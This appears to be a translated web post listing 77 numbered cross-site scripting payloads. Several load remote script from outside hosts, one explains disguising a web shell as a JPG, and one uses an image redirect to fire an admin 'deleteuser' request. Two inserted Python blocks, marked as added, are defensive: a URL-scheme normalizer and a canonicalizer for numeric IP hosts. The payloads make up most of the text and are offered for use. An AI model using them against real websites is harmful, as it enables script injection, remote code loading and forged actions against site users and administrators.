Cross-site image shell

XSS cross-site code: <script>alert("")</script>

Add the code to the first line of the shell (trojan) and save the shell in JPG image format; when the image-format shell is requested, our shell is still executed.
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..[omitted]..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character, part 2 (null characters basically have no effect domestically, because there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
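Items (3) to (19) all rely on one browser behaviour: character references are decoded, then tabs, newlines, carriage returns, NULs and leading spaces are dropped, and only then is the scheme compared case-insensitively. A filter that looks for the literal string "javascript:" in the raw attribute misses every one of them. The following is an added example (not code from the original post) of a normalizer that performs the same decoding before checking the scheme against an allowlist; the function names, the allowlist and the sample inputs are constructed here.

```python
"""Defender-side normalization of URL-valued attributes (SRC, HREF, BACKGROUND, url()).

Added example, not code from the original post. Items (3) to (19) above all lean
on the same browser behaviour: character references are decoded, tabs, newlines,
carriage returns, NULs and other control or space characters are dropped, and the
scheme is then compared case-insensitively. A filter that searches the raw
attribute for the literal "javascript:" misses every one of these variants. The
helper below performs the same decoding before checking the scheme against an
allowlist rather than a blocklist. Function names, the allowlist and the sample
inputs are constructed here.
"""
import html
import unicodedata
from typing import List, Tuple
from urllib.parse import urlsplit

# Schemes a typical content filter is willing to let through in user-supplied HTML.
ALLOWED_SCHEMES = {"http", "https", "mailto"}


def _is_droppable(ch: str) -> bool:
    # Browsers strip tab/newline/CR anywhere in a URL and leading/trailing C0
    # controls and spaces; item (47) shows CSS url() tolerating even more. We drop
    # every control, format and whitespace code point anywhere, which is stricter
    # than the specs but errs toward rejecting, which is what a filter wants.
    return ord(ch) <= 0x20 or ch.isspace() or unicodedata.category(ch) in ("Cc", "Cf")


def normalize_url_attr(raw: str) -> str:
    """Decode HTML character references (with or without ';') and drop control or
    space characters, producing the string the browser's URL parser actually sees."""
    decoded = html.unescape(raw)  # &#106; &#x6A &Tab; &NewLine; -> literal characters
    return "".join(ch for ch in decoded if not _is_droppable(ch))


def is_safe_url_attr(raw: str) -> bool:
    """True if the attribute resolves to a relative URL or an allowlisted scheme."""
    try:
        scheme = urlsplit(normalize_url_attr(raw)).scheme
    except ValueError:
        return False
    if scheme == "":
        return True  # relative or scheme-relative URL; host allowlisting is a separate check
    return scheme.lower() in ALLOWED_SCHEMES


# Constructed samples following the variants listed above, with the expected verdict.
SAMPLES: List[Tuple[str, bool]] = [
    ("javascript:alert('XSS')", False),                       # (3) no quotes, no semicolon
    ("JaVaScRiPt:alert('XSS')", False),                       # (4) case variation
    ("&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", False),  # (5) decimal refs
    ("&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", False),        # (10) hex, no ';'
    ("jav\tascript:alert('XSS')", False),                     # (11) embedded tab
    ("jav&#x09;ascript:alert('XSS')", False),                 # (12) encoded tab
    ("jav\nascript:alert('XSS')", False),                     # (13) newline
    ("jav\rascript:alert('XSS')", False),                     # (14) carriage return
    ("java\0script:alert('XSS')", False),                     # (17) NUL
    (" \u00a0javascript:alert('XSS')", False),                # (19) leading space / NBSP
    ("vbscript:msgbox(\"XSS\")", False),                      # (40) other scripting scheme
    ("https://example.invalid/img.png", True),
    ("/images/logo.png", True),
    ("//example.invalid/static/app.js", True),
    ("mailto:someone@example.invalid", True),
]


def check_samples() -> List[Tuple[str, bool, bool]]:
    """(raw attribute, expected verdict, actual verdict) for every sample."""
    return [(raw, expected, is_safe_url_attr(raw)) for raw, expected in SAMPLES]


if __name__ == "__main__":
    for raw, expected, actual in check_samples():
        status = "ok " if expected == actual else "BAD"
        print(f"{status} safe={actual!s:5} {raw!r}")
```

The allowlist is the important design choice: a blocklist has to enumerate javascript:, vbscript:, data: and whatever the next browser adds, whereas the allowlist only has to name the two or three schemes the application actually needs. Decoding first and matching second is what makes the tab, newline and NUL variants collapse into the same string.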
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag, part 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters prepended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url( javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside Flash can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can run arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
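Items (70) to (73) exploit the browser's lenient IPv4 parsing (a single decimal number, hexadecimal or octal components, fewer than four components, tabs and newlines removed), and a link filter or host allowlist that compares the raw host string is sidestepped by any of them. The following is an added example (not code from the original post) that applies the same parsing rules to produce one canonical host to compare against; it also covers the trailing-dot and scheme-relative forms of items (74) to (76). The function names, the allowlist and the sample links are constructed here.

```python
"""Canonicalizing link hosts that hide behind legacy numeric IP forms.

Added example, not code from the original post. Items (70) to (76) above work
because a browser's URL parser accepts an IPv4 address as a single decimal
number, as hexadecimal or octal components, as fewer than four components,
with tab and newline characters removed, and with a trailing dot on a DNS name.
A link filter or allowlist that compares the raw host string is therefore easy
to sidestep. The helper below applies the same rules the parser does and yields
one canonical host string to compare against. Function names, the allowlist and
the sample links are constructed here.
"""
from typing import Optional, Dict
from urllib.parse import urlsplit


def _parse_ipv4_number(text: str) -> Optional[int]:
    """One dotted component: 0x.. hex, leading-zero octal, else decimal. None if invalid."""
    base = 10
    if len(text) >= 2 and text[:2].lower() == "0x":
        base, text = 16, text[2:]
        if text == "":
            return 0  # a bare "0x" component parses as zero
    elif len(text) >= 2 and text[0] == "0":
        base, text = 8, text[1:]
    digits = "0123456789abcdef"[:base]
    # Do not rely on int() alone: it tolerates whitespace and underscores.
    if not text or any(ch not in digits for ch in text.lower()):
        return None
    return int(text, base)


def ipv4_from_legacy(host: str) -> Optional[str]:
    """Dotted-quad string for any host the URL parser would treat as IPv4, else None."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()  # "1.2.3.4." is accepted with a trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    numbers = []
    for part in parts:
        value = _parse_ipv4_number(part)
        if value is None:
            return None
        numbers.append(value)
    # Every component but the last is one byte; the last fills the remaining bytes,
    # which is how "3232235521" and "192.168.1" both become valid addresses.
    if any(n > 255 for n in numbers[:-1]) or numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    total = numbers[-1]
    for index, n in enumerate(numbers[:-1]):
        total += n << (8 * (3 - index))
    return ".".join(str((total >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url: str) -> Optional[str]:
    """Host the browser would connect to: lower-cased, trailing dot removed, numeric forms resolved."""
    cleaned = "".join(ch for ch in url if ch not in "\t\n\r")  # the URL parser discards these
    try:
        host = urlsplit(cleaned).hostname  # already lower-cased by urlsplit
    except ValueError:
        return None
    if not host:
        return None
    host = host.rstrip(".")
    return ipv4_from_legacy(host) or host


def host_allowed(url: str, allowlist: set) -> bool:
    """Compare the canonical host, never the raw string, against an allowlist."""
    host = canonical_host(url)
    return host is not None and host in allowlist


# Constructed sample links mirroring items (70) to (76); the first four all name 192.168.0.1.
SAMPLE_LINKS = [
    "http://3232235521",                 # (70) decimal
    "http://0xc0.0xa8.0x00.0x01",        # (71) hexadecimal
    "http://0300.0250.0000.0001",        # (72) octal
    "http://192.168.1",                  # three components, last fills two bytes
    "h\ntt\tp://6\t6.000146.0x7.147/",   # (73) mixed encoding with embedded tab/newline
    "//www.google.com/",                 # (74) scheme-relative
    "http://google.com/",                # (75) without www
    "http://www.google.com./",           # (76) trailing dot
]


def resolve_samples() -> Dict[str, Optional[str]]:
    """Raw link -> canonical host for every sample."""
    return {link: canonical_host(link) for link in SAMPLE_LINKS}


if __name__ == "__main__":
    allowlist = {"www.google.com"}
    for link, host in resolve_samples().items():
        print(f"{link!r:40} -> {host!s:18} allowed={host_allowed(link, allowlist)}")
```

Note that the parser is deliberately written by hand rather than with `ipaddress.ip_address`, which rejects the octal, hexadecimal and short forms that browsers accept; a canonicalizer has to be at least as lenient as the client it is protecting, and then compare the result, not the input.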
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>